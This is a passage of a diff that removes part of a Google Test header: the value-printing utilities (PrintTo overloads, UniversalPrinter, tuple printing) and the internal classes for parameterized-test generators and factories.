-// UniversalPrinter<T>::Print() does when PrintTo() is not specialized
-// or overloaded for type T.
-//
-// A user can override this behavior for a class type Foo by defining
-// an overload of PrintTo() in the namespace where Foo is defined.  We
-// give the user this option as sometimes defining a << operator for
-// Foo is not desirable (e.g. the coding style may prevent doing it,
-// or there is already a << operator but it doesn't do what the user
-// wants).
-template <typename T>
-void PrintTo(const T& value, ::std::ostream* os) {
-  // DefaultPrintTo() is overloaded.  The type of its first two
-  // arguments determine which version will be picked.  If T is an
-  // STL-style container, the version for container will be called; if
-  // T is a pointer, the pointer version will be called; otherwise the
-  // generic version will be called.
-  //
-  // Note that we check for container types here, prior to we check
-  // for protocol message types in our operator<<.  The rationale is:
-  //
-  // For protocol messages, we want to give people a chance to
-  // override Google Mock's format by defining a PrintTo() or
-  // operator<<.  For STL containers, other formats can be
-  // incompatible with Google Mock's format for the container
-  // elements; therefore we check for container types here to ensure
-  // that our format is used.
-  //
-  // The second argument of DefaultPrintTo() is needed to bypass a bug
-  // in Symbian's C++ compiler that prevents it from picking the right
-  // overload between:
-  //
-  //   PrintTo(const T& x, ...);
-  //   PrintTo(T* x, ...);
-  DefaultPrintTo(IsContainerTest<T>(0), is_pointer<T>(), value, os);
-}
-
-// The following list of PrintTo() overloads tells
-// UniversalPrinter<T>::Print() how to print standard types (built-in
-// types, strings, plain arrays, and pointers).
-
-// Overloads for various char types.
-GTEST_API_ void PrintTo(unsigned char c, ::std::ostream* os);
-GTEST_API_ void PrintTo(signed char c, ::std::ostream* os);
-inline void PrintTo(char c, ::std::ostream* os) {
-  // When printing a plain char, we always treat it as unsigned.  This
-  // way, the output won't be affected by whether the compiler thinks
-  // char is signed or not.
-  PrintTo(static_cast<unsigned char>(c), os);
-}
-
-// Overloads for other simple built-in types.
-inline void PrintTo(bool x, ::std::ostream* os) {
-  *os << (x ? "true" : "false");
-}
-
-// Overload for wchar_t type.
-// Prints a wchar_t as a symbol if it is printable or as its internal
-// code otherwise and also as its decimal code (except for L'\0').
-// The L'\0' char is printed as "L'\\0'". The decimal code is printed
-// as signed integer when wchar_t is implemented by the compiler
-// as a signed type and is printed as an unsigned integer when wchar_t
-// is implemented as an unsigned type.
-GTEST_API_ void PrintTo(wchar_t wc, ::std::ostream* os);
-
-// Overloads for C strings.
-GTEST_API_ void PrintTo(const char* s, ::std::ostream* os);
-inline void PrintTo(char* s, ::std::ostream* os) {
-  PrintTo(ImplicitCast_<const char*>(s), os);
-}
-
-// signed/unsigned char is often used for representing binary data, so
-// we print pointers to it as void* to be safe.
-inline void PrintTo(const signed char* s, ::std::ostream* os) {
-  PrintTo(ImplicitCast_<const void*>(s), os);
-}
-inline void PrintTo(signed char* s, ::std::ostream* os) {
-  PrintTo(ImplicitCast_<const void*>(s), os);
-}
-inline void PrintTo(const unsigned char* s, ::std::ostream* os) {
-  PrintTo(ImplicitCast_<const void*>(s), os);
-}
-inline void PrintTo(unsigned char* s, ::std::ostream* os) {
-  PrintTo(ImplicitCast_<const void*>(s), os);
-}
-
-// MSVC can be configured to define wchar_t as a typedef of unsigned
-// short.  It defines _NATIVE_WCHAR_T_DEFINED when wchar_t is a native
-// type.  When wchar_t is a typedef, defining an overload for const
-// wchar_t* would cause unsigned short* be printed as a wide string,
-// possibly causing invalid memory accesses.
-#if !defined(_MSC_VER) || defined(_NATIVE_WCHAR_T_DEFINED)
-// Overloads for wide C strings
-GTEST_API_ void PrintTo(const wchar_t* s, ::std::ostream* os);
-inline void PrintTo(wchar_t* s, ::std::ostream* os) {
-  PrintTo(ImplicitCast_<const wchar_t*>(s), os);
-}
-#endif
-
-// Overload for C arrays.  Multi-dimensional arrays are printed
-// properly.
-
-// Prints the given number of elements in an array, without printing
-// the curly braces.
-template <typename T>
-void PrintRawArrayTo(const T a[], size_t count, ::std::ostream* os) {
-  UniversalPrint(a[0], os);
-  for (size_t i = 1; i != count; i++) {
-    *os << ", ";
-    UniversalPrint(a[i], os);
-  }
-}
-
-// Overloads for ::string and ::std::string.
-#if GTEST_HAS_GLOBAL_STRING
-GTEST_API_ void PrintStringTo(const ::string&s, ::std::ostream* os);
-inline void PrintTo(const ::string& s, ::std::ostream* os) {
-  PrintStringTo(s, os);
-}
-#endif  // GTEST_HAS_GLOBAL_STRING
-
-GTEST_API_ void PrintStringTo(const ::std::string&s, ::std::ostream* os);
-inline void PrintTo(const ::std::string& s, ::std::ostream* os) {
-  PrintStringTo(s, os);
-}
-
-// Overloads for ::wstring and ::std::wstring.
-#if GTEST_HAS_GLOBAL_WSTRING
-GTEST_API_ void PrintWideStringTo(const ::wstring&s, ::std::ostream* os);
-inline void PrintTo(const ::wstring& s, ::std::ostream* os) {
-  PrintWideStringTo(s, os);
-}
-#endif  // GTEST_HAS_GLOBAL_WSTRING
-
-#if GTEST_HAS_STD_WSTRING
-GTEST_API_ void PrintWideStringTo(const ::std::wstring&s, ::std::ostream* os);
-inline void PrintTo(const ::std::wstring& s, ::std::ostream* os) {
-  PrintWideStringTo(s, os);
-}
-#endif  // GTEST_HAS_STD_WSTRING
-
-#if GTEST_HAS_TR1_TUPLE || GTEST_HAS_STD_TUPLE_
-// Helper function for printing a tuple.  T must be instantiated with
-// a tuple type.
-template <typename T>
-void PrintTupleTo(const T& t, ::std::ostream* os);
-#endif  // GTEST_HAS_TR1_TUPLE || GTEST_HAS_STD_TUPLE_
-
-#if GTEST_HAS_TR1_TUPLE
-// Overload for ::std::tr1::tuple.  Needed for printing function arguments,
-// which are packed as tuples.
-
-// Overloaded PrintTo() for tuples of various arities.  We support
-// tuples of up-to 10 fields.  The following implementation works
-// regardless of whether tr1::tuple is implemented using the
-// non-standard variadic template feature or not.
-
-inline void PrintTo(const ::std::tr1::tuple<>& t, ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1>
-void PrintTo(const ::std::tr1::tuple<T1>& t, ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2>
-void PrintTo(const ::std::tr1::tuple<T1, T2>& t, ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3>& t, ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3, T4>& t, ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3, T4, T5>& t,
-             ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-          typename T6>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3, T4, T5, T6>& t,
-             ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-          typename T6, typename T7>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3, T4, T5, T6, T7>& t,
-             ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-          typename T6, typename T7, typename T8>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3, T4, T5, T6, T7, T8>& t,
-             ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-          typename T6, typename T7, typename T8, typename T9>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3, T4, T5, T6, T7, T8, T9>& t,
-             ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-          typename T6, typename T7, typename T8, typename T9, typename T10>
-void PrintTo(
-    const ::std::tr1::tuple<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10>& t,
-    ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-#endif  // GTEST_HAS_TR1_TUPLE
-
-#if GTEST_HAS_STD_TUPLE_
-template <typename... Types>
-void PrintTo(const ::std::tuple<Types...>& t, ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-#endif  // GTEST_HAS_STD_TUPLE_
-
-// Overload for std::pair.
-template <typename T1, typename T2>
-void PrintTo(const ::std::pair<T1, T2>& value, ::std::ostream* os) {
-  *os << '(';
-  // We cannot use UniversalPrint(value.first, os) here, as T1 may be
-  // a reference type.  The same for printing value.second.
-  UniversalPrinter<T1>::Print(value.first, os);
-  *os << ", ";
-  UniversalPrinter<T2>::Print(value.second, os);
-  *os << ')';
-}
-
-// Implements printing a non-reference type T by letting the compiler
-// pick the right overload of PrintTo() for T.
-template <typename T>
-class UniversalPrinter {
- public:
-  // MSVC warns about adding const to a function type, so we want to
-  // disable the warning.
-  GTEST_DISABLE_MSC_WARNINGS_PUSH_(4180)
-
-  // Note: we deliberately don't call this PrintTo(), as that name
-  // conflicts with ::testing::internal::PrintTo in the body of the
-  // function.
-  static void Print(const T& value, ::std::ostream* os) {
-    // By default, ::testing::internal::PrintTo() is used for printing
-    // the value.
-    //
-    // Thanks to Koenig look-up, if T is a class and has its own
-    // PrintTo() function defined in its namespace, that function will
-    // be visible here.  Since it is more specific than the generic ones
-    // in ::testing::internal, it will be picked by the compiler in the
-    // following statement - exactly what we want.
-    PrintTo(value, os);
-  }
-
-  GTEST_DISABLE_MSC_WARNINGS_POP_()
-};
-
-// UniversalPrintArray(begin, len, os) prints an array of 'len'
-// elements, starting at address 'begin'.
-template <typename T>
-void UniversalPrintArray(const T* begin, size_t len, ::std::ostream* os) {
-  if (len == 0) {
-    *os << "{}";
-  } else {
-    *os << "{ ";
-    const size_t kThreshold = 18;
-    const size_t kChunkSize = 8;
-    // If the array has more than kThreshold elements, we'll have to
-    // omit some details by printing only the first and the last
-    // kChunkSize elements.
-    // TODO(wan@google.com): let the user control the threshold using a flag.
-    if (len <= kThreshold) {
-      PrintRawArrayTo(begin, len, os);
-    } else {
-      PrintRawArrayTo(begin, kChunkSize, os);
-      *os << ", ..., ";
-      PrintRawArrayTo(begin + len - kChunkSize, kChunkSize, os);
-    }
-    *os << " }";
-  }
-}
-// This overload prints a (const) char array compactly.
-GTEST_API_ void UniversalPrintArray(
-    const char* begin, size_t len, ::std::ostream* os);
-
-// This overload prints a (const) wchar_t array compactly.
-GTEST_API_ void UniversalPrintArray(
-    const wchar_t* begin, size_t len, ::std::ostream* os);
-
-// Implements printing an array type T[N].
-template <typename T, size_t N>
-class UniversalPrinter<T[N]> {
- public:
-  // Prints the given array, omitting some elements when there are too
-  // many.
-  static void Print(const T (&a)[N], ::std::ostream* os) {
-    UniversalPrintArray(a, N, os);
-  }
-};
-
-// Implements printing a reference type T&.
-template <typename T>
-class UniversalPrinter<T&> {
- public:
-  // MSVC warns about adding const to a function type, so we want to
-  // disable the warning.
-  GTEST_DISABLE_MSC_WARNINGS_PUSH_(4180)
-
-  static void Print(const T& value, ::std::ostream* os) {
-    // Prints the address of the value.  We use reinterpret_cast here
-    // as static_cast doesn't compile when T is a function type.
-    *os << "@" << reinterpret_cast<const void*>(&value) << " ";
-
-    // Then prints the value itself.
-    UniversalPrint(value, os);
-  }
-
-  GTEST_DISABLE_MSC_WARNINGS_POP_()
-};
-
-// Prints a value tersely: for a reference type, the referenced value
-// (but not the address) is printed; for a (const) char pointer, the
-// NUL-terminated string (but not the pointer) is printed.
-
-template <typename T>
-class UniversalTersePrinter {
- public:
-  static void Print(const T& value, ::std::ostream* os) {
-    UniversalPrint(value, os);
-  }
-};
-template <typename T>
-class UniversalTersePrinter<T&> {
- public:
-  static void Print(const T& value, ::std::ostream* os) {
-    UniversalPrint(value, os);
-  }
-};
-template <typename T, size_t N>
-class UniversalTersePrinter<T[N]> {
- public:
-  static void Print(const T (&value)[N], ::std::ostream* os) {
-    UniversalPrinter<T[N]>::Print(value, os);
-  }
-};
-template <>
-class UniversalTersePrinter<const char*> {
- public:
-  static void Print(const char* str, ::std::ostream* os) {
-    if (str == NULL) {
-      *os << "NULL";
-    } else {
-      UniversalPrint(string(str), os);
-    }
-  }
-};
-template <>
-class UniversalTersePrinter<char*> {
- public:
-  static void Print(char* str, ::std::ostream* os) {
-    UniversalTersePrinter<const char*>::Print(str, os);
-  }
-};
-
-#if GTEST_HAS_STD_WSTRING
-template <>
-class UniversalTersePrinter<const wchar_t*> {
- public:
-  static void Print(const wchar_t* str, ::std::ostream* os) {
-    if (str == NULL) {
-      *os << "NULL";
-    } else {
-      UniversalPrint(::std::wstring(str), os);
-    }
-  }
-};
-#endif
-
-template <>
-class UniversalTersePrinter<wchar_t*> {
- public:
-  static void Print(wchar_t* str, ::std::ostream* os) {
-    UniversalTersePrinter<const wchar_t*>::Print(str, os);
-  }
-};
-
-template <typename T>
-void UniversalTersePrint(const T& value, ::std::ostream* os) {
-  UniversalTersePrinter<T>::Print(value, os);
-}
-
-// Prints a value using the type inferred by the compiler.  The
-// difference between this and UniversalTersePrint() is that for a
-// (const) char pointer, this prints both the pointer and the
-// NUL-terminated string.
-template <typename T>
-void UniversalPrint(const T& value, ::std::ostream* os) {
-  // A workarond for the bug in VC++ 7.1 that prevents us from instantiating
-  // UniversalPrinter with T directly.
-  typedef T T1;
-  UniversalPrinter<T1>::Print(value, os);
-}
-
-typedef ::std::vector<string> Strings;
-
-// TuplePolicy<TupleT> must provide:
-// - tuple_size
-//     size of tuple TupleT.
-// - get<size_t I>(const TupleT& t)
-//     static function extracting element I of tuple TupleT.
-// - tuple_element<size_t I>::type
-//     type of element I of tuple TupleT.
-template <typename TupleT>
-struct TuplePolicy;
-
-#if GTEST_HAS_TR1_TUPLE
-template <typename TupleT>
-struct TuplePolicy {
-  typedef TupleT Tuple;
-  static const size_t tuple_size = ::std::tr1::tuple_size<Tuple>::value;
-
-  template <size_t I>
-  struct tuple_element : ::std::tr1::tuple_element<I, Tuple> {};
-
-  template <size_t I>
-  static typename AddReference<
-      const typename ::std::tr1::tuple_element<I, Tuple>::type>::type get(
-      const Tuple& tuple) {
-    return ::std::tr1::get<I>(tuple);
-  }
-};
-template <typename TupleT>
-const size_t TuplePolicy<TupleT>::tuple_size;
-#endif  // GTEST_HAS_TR1_TUPLE
-
-#if GTEST_HAS_STD_TUPLE_
-template <typename... Types>
-struct TuplePolicy< ::std::tuple<Types...> > {
-  typedef ::std::tuple<Types...> Tuple;
-  static const size_t tuple_size = ::std::tuple_size<Tuple>::value;
-
-  template <size_t I>
-  struct tuple_element : ::std::tuple_element<I, Tuple> {};
-
-  template <size_t I>
-  static const typename ::std::tuple_element<I, Tuple>::type& get(
-      const Tuple& tuple) {
-    return ::std::get<I>(tuple);
-  }
-};
-template <typename... Types>
-const size_t TuplePolicy< ::std::tuple<Types...> >::tuple_size;
-#endif  // GTEST_HAS_STD_TUPLE_
-
-#if GTEST_HAS_TR1_TUPLE || GTEST_HAS_STD_TUPLE_
-// This helper template allows PrintTo() for tuples and
-// UniversalTersePrintTupleFieldsToStrings() to be defined by
-// induction on the number of tuple fields.  The idea is that
-// TuplePrefixPrinter<N>::PrintPrefixTo(t, os) prints the first N
-// fields in tuple t, and can be defined in terms of
-// TuplePrefixPrinter<N - 1>.
-//
-// The inductive case.
-template <size_t N>
-struct TuplePrefixPrinter {
-  // Prints the first N fields of a tuple.
-  template <typename Tuple>
-  static void PrintPrefixTo(const Tuple& t, ::std::ostream* os) {
-    TuplePrefixPrinter<N - 1>::PrintPrefixTo(t, os);
-    GTEST_INTENTIONAL_CONST_COND_PUSH_()
-    if (N > 1) {
-    GTEST_INTENTIONAL_CONST_COND_POP_()
-      *os << ", ";
-    }
-    UniversalPrinter<
-        typename TuplePolicy<Tuple>::template tuple_element<N - 1>::type>
-        ::Print(TuplePolicy<Tuple>::template get<N - 1>(t), os);
-  }
-
-  // Tersely prints the first N fields of a tuple to a string vector,
-  // one element for each field.
-  template <typename Tuple>
-  static void TersePrintPrefixToStrings(const Tuple& t, Strings* strings) {
-    TuplePrefixPrinter<N - 1>::TersePrintPrefixToStrings(t, strings);
-    ::std::stringstream ss;
-    UniversalTersePrint(TuplePolicy<Tuple>::template get<N - 1>(t), &ss);
-    strings->push_back(ss.str());
-  }
-};
-
-// Base case.
-template <>
-struct TuplePrefixPrinter<0> {
-  template <typename Tuple>
-  static void PrintPrefixTo(const Tuple&, ::std::ostream*) {}
-
-  template <typename Tuple>
-  static void TersePrintPrefixToStrings(const Tuple&, Strings*) {}
-};
-
-// Helper function for printing a tuple.
-// Tuple must be either std::tr1::tuple or std::tuple type.
-template <typename Tuple>
-void PrintTupleTo(const Tuple& t, ::std::ostream* os) {
-  *os << "(";
-  TuplePrefixPrinter<TuplePolicy<Tuple>::tuple_size>::PrintPrefixTo(t, os);
-  *os << ")";
-}
-
-// Prints the fields of a tuple tersely to a string vector, one
-// element for each field.  See the comment before
-// UniversalTersePrint() for how we define "tersely".
-template <typename Tuple>
-Strings UniversalTersePrintTupleFieldsToStrings(const Tuple& value) {
-  Strings result;
-  TuplePrefixPrinter<TuplePolicy<Tuple>::tuple_size>::
-      TersePrintPrefixToStrings(value, &result);
-  return result;
-}
-#endif  // GTEST_HAS_TR1_TUPLE || GTEST_HAS_STD_TUPLE_
-
-}  // namespace internal
-
-template <typename T>
-::std::string PrintToString(const T& value) {
-  ::std::stringstream ss;
-  internal::UniversalTersePrinter<T>::Print(value, &ss);
-  return ss.str();
-}
-
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_PRINTERS_H_
-
-#if GTEST_HAS_PARAM_TEST
-
-namespace testing {
-namespace internal {
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Outputs a message explaining invalid registration of different
-// fixture class for the same test case. This may happen when
-// TEST_P macro is used to define two tests with the same name
-// but in different namespaces.
-GTEST_API_ void ReportInvalidTestCaseType(const char* test_case_name,
-                                          const char* file, int line);
-
-template <typename> class ParamGeneratorInterface;
-template <typename> class ParamGenerator;
-
-// Interface for iterating over elements provided by an implementation
-// of ParamGeneratorInterface<T>.
-template <typename T>
-class ParamIteratorInterface {
- public:
-  virtual ~ParamIteratorInterface() {}
-  // A pointer to the base generator instance.
-  // Used only for the purposes of iterator comparison
-  // to make sure that two iterators belong to the same generator.
-  virtual const ParamGeneratorInterface<T>* BaseGenerator() const = 0;
-  // Advances iterator to point to the next element
-  // provided by the generator. The caller is responsible
-  // for not calling Advance() on an iterator equal to
-  // BaseGenerator()->End().
-  virtual void Advance() = 0;
-  // Clones the iterator object. Used for implementing copy semantics
-  // of ParamIterator<T>.
-  virtual ParamIteratorInterface* Clone() const = 0;
-  // Dereferences the current iterator and provides (read-only) access
-  // to the pointed value. It is the caller's responsibility not to call
-  // Current() on an iterator equal to BaseGenerator()->End().
-  // Used for implementing ParamGenerator<T>::operator*().
-  virtual const T* Current() const = 0;
-  // Determines whether the given iterator and other point to the same
-  // element in the sequence generated by the generator.
-  // Used for implementing ParamGenerator<T>::operator==().
-  virtual bool Equals(const ParamIteratorInterface& other) const = 0;
-};
-
-// Class iterating over elements provided by an implementation of
-// ParamGeneratorInterface<T>. It wraps ParamIteratorInterface<T>
-// and implements the const forward iterator concept.
-template <typename T>
-class ParamIterator {
- public:
-  typedef T value_type;
-  typedef const T& reference;
-  typedef ptrdiff_t difference_type;
-
-  // ParamIterator assumes ownership of the impl_ pointer.
-  ParamIterator(const ParamIterator& other) : impl_(other.impl_->Clone()) {}
-  ParamIterator& operator=(const ParamIterator& other) {
-    if (this != &other)
-      impl_.reset(other.impl_->Clone());
-    return *this;
-  }
-
-  const T& operator*() const { return *impl_->Current(); }
-  const T* operator->() const { return impl_->Current(); }
-  // Prefix version of operator++.
-  ParamIterator& operator++() {
-    impl_->Advance();
-    return *this;
-  }
-  // Postfix version of operator++.
-  ParamIterator operator++(int /*unused*/) {
-    ParamIteratorInterface<T>* clone = impl_->Clone();
-    impl_->Advance();
-    return ParamIterator(clone);
-  }
-  bool operator==(const ParamIterator& other) const {
-    return impl_.get() == other.impl_.get() || impl_->Equals(*other.impl_);
-  }
-  bool operator!=(const ParamIterator& other) const {
-    return !(*this == other);
-  }
-
- private:
-  friend class ParamGenerator<T>;
-  explicit ParamIterator(ParamIteratorInterface<T>* impl) : impl_(impl) {}
-  scoped_ptr<ParamIteratorInterface<T> > impl_;
-};
-
-// ParamGeneratorInterface<T> is the binary interface to access generators
-// defined in other translation units.
-template <typename T>
-class ParamGeneratorInterface {
- public:
-  typedef T ParamType;
-
-  virtual ~ParamGeneratorInterface() {}
-
-  // Generator interface definition
-  virtual ParamIteratorInterface<T>* Begin() const = 0;
-  virtual ParamIteratorInterface<T>* End() const = 0;
-};
-
-// Wraps ParamGeneratorInterface<T> and provides general generator syntax
-// compatible with the STL Container concept.
-// This class implements copy initialization semantics and the contained
-// ParamGeneratorInterface<T> instance is shared among all copies
-// of the original object. This is possible because that instance is immutable.
-template<typename T>
-class ParamGenerator {
- public:
-  typedef ParamIterator<T> iterator;
-
-  explicit ParamGenerator(ParamGeneratorInterface<T>* impl) : impl_(impl) {}
-  ParamGenerator(const ParamGenerator& other) : impl_(other.impl_) {}
-
-  ParamGenerator& operator=(const ParamGenerator& other) {
-    impl_ = other.impl_;
-    return *this;
-  }
-
-  iterator begin() const { return iterator(impl_->Begin()); }
-  iterator end() const { return iterator(impl_->End()); }
-
- private:
-  linked_ptr<const ParamGeneratorInterface<T> > impl_;
-};
-
-// Generates values from a range of two comparable values. Can be used to
-// generate sequences of user-defined types that implement operator+() and
-// operator<().
-// This class is used in the Range() function.
-template <typename T, typename IncrementT>
-class RangeGenerator : public ParamGeneratorInterface<T> {
- public:
-  RangeGenerator(T begin, T end, IncrementT step)
-      : begin_(begin), end_(end),
-        step_(step), end_index_(CalculateEndIndex(begin, end, step)) {}
-  virtual ~RangeGenerator() {}
-
-  virtual ParamIteratorInterface<T>* Begin() const {
-    return new Iterator(this, begin_, 0, step_);
-  }
-  virtual ParamIteratorInterface<T>* End() const {
-    return new Iterator(this, end_, end_index_, step_);
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<T> {
-   public:
-    Iterator(const ParamGeneratorInterface<T>* base, T value, int index,
-             IncrementT step)
-        : base_(base), value_(value), index_(index), step_(step) {}
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<T>* BaseGenerator() const {
-      return base_;
-    }
-    virtual void Advance() {
-      value_ = value_ + step_;
-      index_++;
-    }
-    virtual ParamIteratorInterface<T>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const T* Current() const { return &value_; }
-    virtual bool Equals(const ParamIteratorInterface<T>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const int other_index =
-          CheckedDowncastToActualType<const Iterator>(&other)->index_;
-      return index_ == other_index;
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : ParamIteratorInterface<T>(),
-          base_(other.base_), value_(other.value_), index_(other.index_),
-          step_(other.step_) {}
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<T>* const base_;
-    T value_;
-    int index_;
-    const IncrementT step_;
-  };  // class RangeGenerator::Iterator
-
-  static int CalculateEndIndex(const T& begin,
-                               const T& end,
-                               const IncrementT& step) {
-    int end_index = 0;
-    for (T i = begin; i < end; i = i + step)
-      end_index++;
-    return end_index;
-  }
-
-  // No implementation - assignment is unsupported.
-  void operator=(const RangeGenerator& other);
-
-  const T begin_;
-  const T end_;
-  const IncrementT step_;
-  // The index for the end() iterator. All the elements in the generated
-  // sequence are indexed (0-based) to aid iterator comparison.
-  const int end_index_;
-};  // class RangeGenerator
-
-
-// Generates values from a pair of STL-style iterators. Used in the
-// ValuesIn() function. The elements are copied from the source range
-// since the source can be located on the stack, and the generator
-// is likely to persist beyond that stack frame.
-template <typename T>
-class ValuesInIteratorRangeGenerator : public ParamGeneratorInterface<T> {
- public:
-  template <typename ForwardIterator>
-  ValuesInIteratorRangeGenerator(ForwardIterator begin, ForwardIterator end)
-      : container_(begin, end) {}
-  virtual ~ValuesInIteratorRangeGenerator() {}
-
-  virtual ParamIteratorInterface<T>* Begin() const {
-    return new Iterator(this, container_.begin());
-  }
-  virtual ParamIteratorInterface<T>* End() const {
-    return new Iterator(this, container_.end());
-  }
-
- private:
-  typedef typename ::std::vector<T> ContainerType;
-
-  class Iterator : public ParamIteratorInterface<T> {
-   public:
-    Iterator(const ParamGeneratorInterface<T>* base,
-             typename ContainerType::const_iterator iterator)
-        : base_(base), iterator_(iterator) {}
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<T>* BaseGenerator() const {
-      return base_;
-    }
-    virtual void Advance() {
-      ++iterator_;
-      value_.reset();
-    }
-    virtual ParamIteratorInterface<T>* Clone() const {
-      return new Iterator(*this);
-    }
-    // We need to use cached value referenced by iterator_ because *iterator_
-    // can return a temporary object (and of type other then T), so just
-    // having "return &*iterator_;" doesn't work.
-    // value_ is updated here and not in Advance() because Advance()
-    // can advance iterator_ beyond the end of the range, and we cannot
-    // detect that fact. The client code, on the other hand, is
-    // responsible for not calling Current() on an out-of-range iterator.
-    virtual const T* Current() const {
-      if (value_.get() == NULL)
-        value_.reset(new T(*iterator_));
-      return value_.get();
-    }
-    virtual bool Equals(const ParamIteratorInterface<T>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      return iterator_ ==
-          CheckedDowncastToActualType<const Iterator>(&other)->iterator_;
-    }
-
-   private:
-    Iterator(const Iterator& other)
-          // The explicit constructor call suppresses a false warning
-          // emitted by gcc when supplied with the -Wextra option.
-        : ParamIteratorInterface<T>(),
-          base_(other.base_),
-          iterator_(other.iterator_) {}
-
-    const ParamGeneratorInterface<T>* const base_;
-    typename ContainerType::const_iterator iterator_;
-    // A cached value of *iterator_. We keep it here to allow access by
-    // pointer in the wrapping iterator's operator->().
-    // value_ needs to be mutable to be accessed in Current().
-    // Use of scoped_ptr helps manage cached value's lifetime,
-    // which is bound by the lifespan of the iterator itself.
-    mutable scoped_ptr<const T> value_;
-  };  // class ValuesInIteratorRangeGenerator::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const ValuesInIteratorRangeGenerator& other);
-
-  const ContainerType container_;
-};  // class ValuesInIteratorRangeGenerator
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Stores a parameter value and later creates tests parameterized with that
-// value.
-template <class TestClass>
-class ParameterizedTestFactory : public TestFactoryBase {
- public:
-  typedef typename TestClass::ParamType ParamType;
-  explicit ParameterizedTestFactory(ParamType parameter) :
-      parameter_(parameter) {}
-  virtual Test* CreateTest() {
-    TestClass::SetParam(&parameter_);
-    return new TestClass();
-  }
-
- private:
-  const ParamType parameter_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ParameterizedTestFactory);
-};
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// TestMetaFactoryBase is a base class for meta-factories that create
-// test factories for passing into MakeAndRegisterTestInfo function.
-template <class ParamType>
-class TestMetaFactoryBase {
- public:
-  virtual ~TestMetaFactoryBase() {}
-
-  virtual TestFactoryBase* CreateTestFactory(ParamType parameter) = 0;
-};
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// TestMetaFactory creates test factories for passing into
-// MakeAndRegisterTestInfo function. Since MakeAndRegisterTestInfo receives
-// ownership of test factory pointer, same factory object cannot be passed
-// into that method twice. But ParameterizedTestCaseInfo is going to call
-// it for each Test/Parameter value combination. Thus it needs meta factory
-// creator class.
-template <class TestCase>
-class TestMetaFactory
-    : public TestMetaFactoryBase<typename TestCase::ParamType> {
- public:
-  typedef typename TestCase::ParamType ParamType;
-
-  TestMetaFactory() {}
-
-  virtual TestFactoryBase* CreateTestFactory(ParamType parameter) {
-    return new ParameterizedTestFactory<TestCase>(parameter);
-  }
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestMetaFactory);
-};
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// ParameterizedTestCaseInfoBase is a generic interface
-// to ParameterizedTestCaseInfo classes. ParameterizedTestCaseInfoBase
-// accumulates test information provided by TEST_P macro invocations
-// and generators provided by INSTANTIATE_TEST_CASE_P macro invocations
-// and uses that information to register all resulting test instances
-// in RegisterTests method. The ParameterizeTestCaseRegistry class holds
-// a collection of pointers to the ParameterizedTestCaseInfo objects
-// and calls RegisterTests() on each of them when asked.
-class ParameterizedTestCaseInfoBase {
- public:
-  virtual ~ParameterizedTestCaseInfoBase() {}
-
-  // Base part of test case name for display purposes.
-  virtual const string& GetTestCaseName() const = 0;
-  // Test case id to verify identity.
-  virtual TypeId GetTestCaseTypeId() const = 0;
-  // UnitTest class invokes this method to register tests in this
-  // test case right before running them in RUN_ALL_TESTS macro.
-  // This method should not be called more then once on any single
-  // instance of a ParameterizedTestCaseInfoBase derived class.
-  virtual void RegisterTests() = 0;
-
- protected:
-  ParameterizedTestCaseInfoBase() {}
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ParameterizedTestCaseInfoBase);
-};
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// ParameterizedTestCaseInfo accumulates tests obtained from TEST_P
-// macro invocations for a particular test case and generators
-// obtained from INSTANTIATE_TEST_CASE_P macro invocations for that
-// test case. It registers tests with all values generated by all
-// generators when asked.
